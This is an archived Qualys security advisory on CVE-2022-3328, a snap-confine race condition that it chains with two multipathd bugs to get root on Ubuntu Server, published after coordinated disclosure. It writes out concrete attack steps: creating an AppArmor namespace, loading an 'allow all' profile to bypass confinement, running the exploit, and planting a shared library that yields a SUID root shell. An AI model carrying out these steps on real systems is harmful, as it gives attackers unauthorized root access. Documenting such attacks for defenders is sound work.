Logo
    CVE-2022-3328 _ Snapd Race condition in snap-confine
    🚥

    CVE-2022-3328 _ Snapd Race condition in snap-confine

    ⚠️ [ ORIGIN SOURCE ]
    https://blog.qualys.com/vulnerabilities-threat-research/2022/11/30/race-condition-in-snap-confines-must_mkdir_and_open_with_perms-cve-2022-3328
    📅 [ Archival Date ]
    Dec 9, 2022 1:43 PM
    🏷️ [ Tags ]
    SnapdUbuntu
    ✍️ [ Author ]

    Saeed Abbasi

    The Qualys Threat Research Unit (TRU) has discovered a new vulnerability in snap-confine function on Linux operating systems, a SUID-root program installed by default on Ubuntu. Qualys recommends that security teams apply the patch for this vulnerability as soon as possible.

    In February 2022, Qualys Threat Research Unit (TRU) published CVE-2021-44731 in our “Lemmings” advisory. The vulnerability (CVE-2022-3328) was introduced in February 2022 by the patch for CVE-2021-44731)

    The Qualys Threat Research Unit (TRU) exploited this bug in Ubuntu Server by combining it with two vulnerabilities in multipathd called Leeloo Multipath (an authorization bypass and a symlink attack, CVE-2022-41974 and CVE-2022-41973), to obtain full root privileges.

    What is snap-confine?

    The snap-confine program is used internally by snapd to construct the execution environment for snap applications, an internal tool for confining snappy applications.

    Read more

    Potential Impact

    Successful exploitation of the three vulnerabilities lets any unprivileged user gain root privileges on the vulnerable device. Qualys security researchers have verified the vulnerability, developed an exploit and obtained full root privileges on default installations of Ubuntu.

    As soon as the Qualys Threat Research Unit confirmed the vulnerability, we engaged in responsible vulnerability disclosure and coordinated with vendors and open-source distributions to announce this newly discovered vulnerability.

    The technical details

    Disclosure Timeline

    • 2022-08-23: Contacted security@ubuntu
    • 2022-11-28: Contacted linux-distros@openwall
    • 2022-11-30: Coordinated Release Date (17:00 UTC)
    Qualys Security Advisory
    
    Race condition in snap-confine's must_mkdir_and_open_with_perms()
    (CVE-2022-3328)
    
    
    ========================================================================
    Contents
    ========================================================================
    
    Summary
    Background
    Exploitation
    Acknowledgments
    Timeline
    
        I can't help but feel a missed opportunity to integrate lyrics from
        one of the best songs ever: [SNAP! - The Power (Official Video)]
            -- https://twitter.com/spendergrsec/status/1494420041076461570
    
    
    ========================================================================
    Summary
    ========================================================================
    
    We discovered a race condition (CVE-2022-3328) in snap-confine, a
    SUID-root program installed by default on Ubuntu. In this advisory, we
    tell the story of this vulnerability (which was introduced in February
    2022 by the patch for CVE-2021-44731) and detail how we exploited it in
    Ubuntu Server (a local privilege escalation, from any user to root) by
    combining it with two vulnerabilities in multipathd (an authorization
    bypass and a symlink attack, CVE-2022-41974 and CVE-2022-41973):
    
    https://www.qualys.com/2022/10/24/leeloo-multipath/leeloo-multipath.txt
    
    
    ========================================================================
    Background
    ========================================================================
    
        Like the crack of the whip, I Snap! attack
        Radical mind, day and night all the time
            -- SNAP! - The Power
    
    In February 2022, we published CVE-2021-44731 in our "Lemmings" advisory
    (https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt):
    to set up a snap's sandbox, snap-confine created the temporary directory
    /tmp/snap.$SNAP_NAME or reused it if it already existed, even if it did
    not belong to root; a local attacker could race against snap-confine,
    retain control over /tmp/snap.$SNAP_NAME, and eventually obtain full
    root privileges.
    
    This vulnerability was patched by commit acb2b4c ("cmd/snap-confine:
    Prevent user-controlled race in setup_private_mount"), which introduced
    a new helper function, must_mkdir_and_open_with_perms():
    
    ------------------------------------------------------------------------
    142 static void setup_private_mount(const char *snap_name)
    ...
    169         sc_must_snprintf(base_dir, sizeof(base_dir), "/tmp/snap.%s", snap_name);
    ...
    176         base_dir_fd = must_mkdir_and_open_with_perms(base_dir, 0, 0, 0700);
    ------------------------------------------------------------------------
     55 static int must_mkdir_and_open_with_perms(const char *dir, uid_t uid, gid_t gid,
     56                                           mode_t mode)
     ..
     61  mkdir:
     ..
     67         if (mkdir(dir, 0700) < 0 && errno != EEXIST) {
     ..
     70         fd = open(dir, O_RDONLY | O_DIRECTORY | O_CLOEXEC | O_NOFOLLOW);
     ..
     81         if (fstat(fd, &st) < 0) {
     ..
     84         if (st.st_uid != uid || st.st_gid != gid
     85             || st.st_mode != (S_IFDIR | mode)) {
    ...
    130                 if (rename(dir, random_dir) < 0) {
    ...
    135                 goto mkdir;
    ------------------------------------------------------------------------
    
    - the temporary directory /tmp/snap.$SNAP_NAME is created at line 67, if
      it does not exist already;
    
    - if it already exists, and if it does not belong to root (at line 84),
      then it is moved out of the way (at line 130) by rename()ing it to a
      random directory in /tmp, and its creation is retried (at line 135).
    
    When we reviewed this patch back in December 2021, we felt very nervous
    about this rename() call (because it allows a local attacker to rename()
    a directory they do not own), and we advised the Ubuntu Security Team to
    either not reuse the directory /tmp/snap.$SNAP_NAME at all, or to create
    it in a non-world-writable directory instead of /tmp, or at least to use
    renameat2(RENAME_EXCHANGE) instead of rename(). Unfortunately, all of
    these ideas were deemed impractical (for example, renameat2() is not
    supported by older kernel and glibc versions); moreover, we (Qualys)
    failed to come up with a feasible attack plan against this rename()
    call, so the patch was kept in its current form.
    
    After the release of Ubuntu 22.04 in April 2022, we decided to revisit
    snap-confine and its recent hardening changes, and we finally found a
    way to exploit the rename() call in must_mkdir_and_open_with_perms().
    
    
    ========================================================================
    Exploitation
    ========================================================================
    
        It's getting, it's getting, it's getting kinda heavy
        It's getting, it's getting, it's getting kinda hectic
            -- SNAP! - The Power
    
    The three key ideas to exploit the rename() of /tmp/snap.$SNAP_NAME are:
    
    1/ snap-confine operates in /tmp to create a snap's temporary directory
    (/tmp/snap.$SNAP_NAME in setup_private_mount()), but it also operates in
    /tmp to create the snap's *root* directory (/tmp/snap.rootfs_XXXXXX in
    sc_bootstrap_mount_namespace(), where all of the Xs are randomized by
    mkdtemp()), and the string rootfs_XXXXXX is accepted as a valid snap
    instance name by sc_instance_name_validate() (when all of the Xs are
    lowercase alphanumeric):
    
    ------------------------------------------------------------------------
    286 static void sc_bootstrap_mount_namespace(const struct sc_mount_config *config)
    ...
    288         char scratch_dir[] = "/tmp/snap.rootfs_XXXXXX";
    ...
    291         if (mkdtemp(scratch_dir) == NULL) {
    ...
    303         sc_do_mount(scratch_dir, scratch_dir, NULL, MS_BIND, NULL);
    ...
    319         sc_do_mount(config->rootfs_dir, scratch_dir, NULL, MS_REC | MS_BIND,
    ...
    331         for (const struct sc_mount * mnt = config->mounts; mnt->path != NULL;
    ...
    342                 sc_must_snprintf(dst, sizeof dst, "%s/%s", scratch_dir,
    343                                  mnt->path);
    ...
    352                         sc_do_mount(mnt->path, dst, NULL, MS_REC | MS_BIND,
    ------------------------------------------------------------------------
    
    2/ We therefore execute two instances of snap-confine in parallel:
    
    - we block the first snap-confine immediately after it creates its root
      directory /tmp/snap.rootfs_XXXXXX at line 291 (we reliably win this
      race condition by "single-stepping" snap-confine, as explained in our
      "Lemmings" advisory);
    
    - we execute the second snap-confine with a snap instance name of
      rootfs_XXXXXX -- i.e., the temporary directory /tmp/snap.$SNAP_NAME of
      this second snap-confine is the root directory /tmp/snap.rootfs_XXXXXX
      of the first snap-confine;
    
    - we kill this second snap-confine immediately after it rename()s its
      temporary directory /tmp/snap.$SNAP_NAME -- i.e., the root directory
      /tmp/snap.rootfs_XXXXXX of the first snap-confine -- at line 130 (we
      reliably win this race condition with inotify, as explained in our
      "Lemmings" advisory);
    
    - we re-create the directory /tmp/snap.rootfs_XXXXXX ourselves, and
      resume the execution of the first snap-confine, whose root directory
      now belongs to us.
    
    3/ We can therefore create an arbitrary symlink
    /tmp/snap.rootfs_XXXXXX/tmp, and sc_bootstrap_mount_namespace() will
    bind-mount the real /tmp directory (which is world-writable) onto any
    directory in the filesystem (because mount() will follow our arbitrary
    symlink at line 352).
    
    This ability will eventually allow us to obtain full root privileges,
    but we must first solve three problems:
    
    ------------------------------------------------------------------------
    Problem a/ We cannot trick snap-confine into rename()ing
    /tmp/snap.rootfs_XXXXXX, because this directory belongs to root and
    must_mkdir_and_open_with_perms() rename()s it only if it does not belong
    to root!
    
    This problem solves itself naturally: indeed, /tmp/snap.rootfs_XXXXXX
    belongs to the user root, but it belongs to the group of our own user,
    so must_mkdir_and_open_with_perms() rename()s it because it does not
    belong to the group root (at line 84).
    
    ------------------------------------------------------------------------
    Problem b/ We cannot trick snap-confine into following our symlink
    /tmp/snap.rootfs_XXXXXX/tmp, because sc_bootstrap_mount_namespace()
    bind-mounts a read-only squashfs onto /tmp/snap.rootfs_XXXXXX (at line
    319): if we create our symlink before this bind-mount, then it becomes
    covered by the squashfs; and we cannot create our symlink after this
    bind-mount, because the squashfs is read-only and belongs to root!
    
    The "Prologue: CVE-2021-3996 and CVE-2021-3995 in util-linux's libmount"
    of our "Lemmings" advisory suggests a solution to this problem: we must
    unmount /tmp/snap.rootfs_XXXXXX each time sc_bootstrap_mount_namespace()
    bind-mounts it (at lines 303 and 319). The "(deleted)" technique we used
    in "Lemmings" (CVE-2021-3996 in util-linux) was patched in January 2022,
    but we found a surprisingly simple workaround:
    
    we mount a FUSE filesystem onto /tmp/snap.rootfs_XXXXXX, immediately
    after we re-create this directory ourselves; this allows us to unmount
    (with fusermount -u -z) any subsequent bind-mounts (even if they belong
    to root), because fusermount does not check that our FUSE filesystem is
    indeed the most recently mounted filesystem on /tmp/snap.rootfs_XXXXXX.
    
    ------------------------------------------------------------------------
    Problem c/ We cannot trick snap-confine into bind-mounting the real /tmp
    onto an arbitrary directory in the filesystem (at line 352), because
    such a bind-mount is forbidden by snap-confine's AppArmor profile!
    
    To solve this problem, we must bypass AppArmor completely, but the
    technique we used in our "Lemmings" advisory (we wrapped snap-confine's
    execution in an AppArmor profile that was in "complain" mode, not in
    "enforce" mode) was patched in February 2022 (by commits 26eed65 and
    4a2eb78, "ensure that snap-confine is in strict confinement" and
    "Tighten AppArmor label check"):
    
    now, snap-confine's execution must be wrapped in an AppArmor profile
    that is in "enforce" mode and whose label matches the regular expression
    "^(/snap/(snapd|core)/x?[0-9]+/usr/lib|/usr/lib(exec)?)/snapd/snap-confine$".
    
    We were about to give up on trying to exploit snap-confine, when we
    discovered CVE-2022-41974 and CVE-2022-41973 in multipathd (which is
    installed by default on Ubuntu Server): these two vulnerabilities allow
    us to create a directory named "failed_wwids" (user root, group root,
    mode 0700) anywhere in the filesystem, and we were able to transform
    this very limited directory creation into a complete AppArmor bypass.
    
    AppArmor supports policy namespaces that are loosely related to kernel
    user namespaces; by default, no AppArmor namespaces exist:
    
    ------------------------------------------------------------------------
    $ ls -la /sys/kernel/security/apparmor/policy/namespaces
    total 0
    drwxr-xr-x 2 root root 0 Aug  6 12:42 .
    drwxr-xr-x 5 root root 0 Aug  6 12:42 ..
    ------------------------------------------------------------------------
    
    However, we (attackers) can create an AppArmor namespace "failed_wwids"
    by exploiting CVE-2022-41974 and CVE-2022-41973 in multipathd:
    
    ------------------------------------------------------------------------
    $ ln -s /sys/kernel/security/apparmor/policy/namespaces /dev/shm/multipath
    
    $ multipathd list devices | grep 'whitelisted, unmonitored'
        sda1 devnode whitelisted, unmonitored
        ...
    
    $ multipathd list list path sda1
    fail
    
    $ ls -la /sys/kernel/security/apparmor/policy/namespaces
    total 0
    drwxr-xr-x 3 root root 0 Aug  6 12:42 .
    drwxr-xr-x 5 root root 0 Aug  6 12:42 ..
    drwx------ 5 root root 0 Aug  6 13:38 failed_wwids
    ------------------------------------------------------------------------
    
    Then, we can enter this AppArmor namespace by creating and entering an
    unprivileged user namespace:
    
    ------------------------------------------------------------------------
    $ aa-exec -n failed_wwids -p unconfined -- unshare -U -r /bin/sh
    ------------------------------------------------------------------------
    
    Inside this namespace, we can create an AppArmor profile labeled
    "/usr/lib/snapd/snap-confine" that is in "enforce" mode and allows all
    possible operations:
    
    ------------------------------------------------------------------------
    # apparmor_parser -K -a << "EOF"
    /usr/lib/snapd/snap-confine (enforce) {
    capability,
    network,
    mount,
    remount,
    umount,
    pivot_root,
    ptrace,
    signal,
    dbus,
    unix,
    file,
    change_profile,
    }
    EOF
    ------------------------------------------------------------------------
    
    Back in the initial namespace, we check that our "allow all" AppArmor
    profile still exists:
    
    ------------------------------------------------------------------------
    # aa-status
    apparmor module is loaded.
    32 profiles are loaded.
    32 profiles are in enforce mode.
       ...
       :failed_wwids:/usr/lib/snapd/snap-confine
    ------------------------------------------------------------------------
    
    Last, we make sure that snap-confine accepts our "allow all" AppArmor
    profile (i.e., AppArmor is bypassed, and snap-confine is effectively
    unconfined):
    
    ------------------------------------------------------------------------
    $ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -n failed_wwids -p /usr/lib/snapd/snap-confine -- /usr/lib/snapd/snap-confine --base lxd snap.lxd.daemon /nonexistent
    ...
    DEBUG: apparmor label on snap-confine is: /usr/lib/snapd/snap-confine
    DEBUG: apparmor mode is: enforce
    ------------------------------------------------------------------------
    
    We can therefore bind-mount /tmp onto an arbitrary directory in the
    filesystem (by exploiting CVE-2022-3328); since we already depend on
    multipathd to bypass AppArmor, we bind-mount /tmp onto /lib/multipath,
    create our own shared library /lib/multipath/libchecktur.so, shutdown
    multipathd (by exploiting CVE-2022-41974), restart multipathd (through
    its Unix socket), and finally obtain full root privileges (because
    multipathd executes our shared library as root when it restarts):
    
    ------------------------------------------------------------------------
    $ grep multipath /proc/self/mountinfo | wc
          0       0       0
    
    $ gcc -o CVE-2022-3328 CVE-2022-3328.c
    $ ./CVE-2022-3328
    scratch directory for constructing namespace: /tmp/snap.rootfs_0j4u9c
    
    $ grep multipath /proc/self/mountinfo
    1395 29 253:0 /tmp /usr/lib/multipath rw,relatime shared:1 - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
    ...
    
    $ gcc -fpic -shared -o /lib/multipath/libchecktur.so libtmpsh.c
    
    $ ps -ef | grep 'multipath[d]'
    root         371       1  0 12:42 ?        00:00:00 /sbin/multipathd -d -s
    
    $ multipathd list list add del switch sus resu rei fai resi rese rel forc dis rest paths maps path P map P gro P rec dae statu stats top con bla dev raw wil quit
    ok
    
    $ ps -ef | grep 'multipath[d]' | wc
          0       0       0
    
    $ ls -l /tmp/sh
    ls: cannot access '/tmp/sh': No such file or directory
    
    $ multipathd list daemon
    error -104 receiving packet
    
    $ ls -l /tmp/sh
    -rwsr-xr-x 1 root root 125688 Aug  6 14:55 /tmp/sh
    
    $ /tmp/sh -p
    # id
    uid=65534(nobody) gid=65534(nogroup) euid=0(root) groups=65534(nogroup)
                                         ^^^^^^^^^^^^
    ------------------------------------------------------------------------
    
    
    ========================================================================
    Acknowledgments
    ========================================================================
    
    We thank the Ubuntu security team (Alex Murray and Seth Arnold in
    particular) and the snapd team for their hard work on this snap-confine
    vulnerability. We also thank the members of linux-distros@openwall.